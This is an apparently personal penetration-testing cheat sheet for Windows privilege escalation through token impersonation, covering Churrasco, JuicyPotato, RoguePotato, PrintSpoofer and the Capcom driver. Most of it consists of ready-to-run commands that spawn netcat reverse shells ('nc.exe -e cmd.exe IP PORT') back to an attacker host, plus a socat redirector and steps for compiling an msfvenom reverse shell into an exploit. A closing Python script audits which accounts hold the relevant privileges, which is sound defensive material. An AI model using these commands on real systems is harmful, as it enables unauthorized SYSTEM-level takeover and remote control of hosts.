windows token exploits
Churrasco
REQUIREMENTS:
SeImpersonatePrivilege
Windows XP/VISTA/2003/2008, Win Server 2003
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
HotPotato
Windows 7,8,10, Server 2008, Server 2012
JuicyPotato
REQUIREMENTS:
SeImpersonatePrivilege
machine is < Windows 10 1809 and < Windows Server 2019
Try:
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID
> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
PrintSpoofer
REQUIREMENTS:
SeImpersonatePrivilege
Win10, Server 2016, Server 2019
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
RoguePotato
REQUIREMENTS:
SeImpersonatePrivilege
machine is >= Windows 10 1809 & Windows Server 2019
# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
REQUIREMENTS:
Visual Studio to compile
Steps:
obtain user SID
Get-ADUser -Identity 'svc-print' | select SID
(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value
Clone Repo: tandasat/ExploitCapcom/
Generate .exe msfvenom reverse shell
Update path to reverse shell on target: line 410 in file ExploitCapcom.cpp
Set for RELEASE
Build Solution
run
.\ExploitCapcom.exe
SeBackupPrivilege
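Every technique on this page depends on an account holding a specific user right, so a host audit should list who holds SeImpersonatePrivilege and SeBackupPrivilege. The script below is an added example, not part of the original notes: it parses a `secedit /export /areas USER_RIGHTS` dump and reports holders outside a baseline. The baseline SIDs and the sample export are assumptions constructed for illustration.

```python
# Added example: flag unexpected holders of the user rights named on this page
# in a `secedit /export /areas USER_RIGHTS /cfg rights.inf` dump.
# secedit writes UTF-16; decode the file before passing its text in.

# Assumed baseline of well-known SIDs per right (LOCAL SERVICE, NETWORK SERVICE,
# Administrators, SERVICE, Backup Operators). Adjust for your environment.
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-19", "S-1-5-20", "S-1-5-32-544", "S-1-5-6"},
    "SeBackupPrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
}

def parse_privilege_rights(inf_text):
    """Return {right: [principal, ...]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line or line.startswith(";"):
            continue
        name, _, value = line.partition("=")
        # SIDs are written as *S-1-...; account names may appear bare.
        rights[name.strip()] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights

def unexpected_holders(inf_text, baseline=BASELINE):
    """Return {right: [principals not in the baseline]} for audited rights."""
    rights = parse_privilege_rights(inf_text)
    findings = {}
    for right, allowed in baseline.items():
        extra = [p for p in rights.get(right, []) if p not in allowed]
        if extra:
            findings[right] = extra
    return findings

# Constructed sample export (the domain SID is made up).
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,svc-print
SeShutdownPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
"""

if __name__ == "__main__":
    for right, who in unexpected_holders(SAMPLE_INF).items():
        print(f"{right}: review {', '.join(who)}")
```

Each principal it reports is an account whose compromise gives an attacker the prerequisite listed under REQUIREMENTS above, so remove the right where the service does not need it.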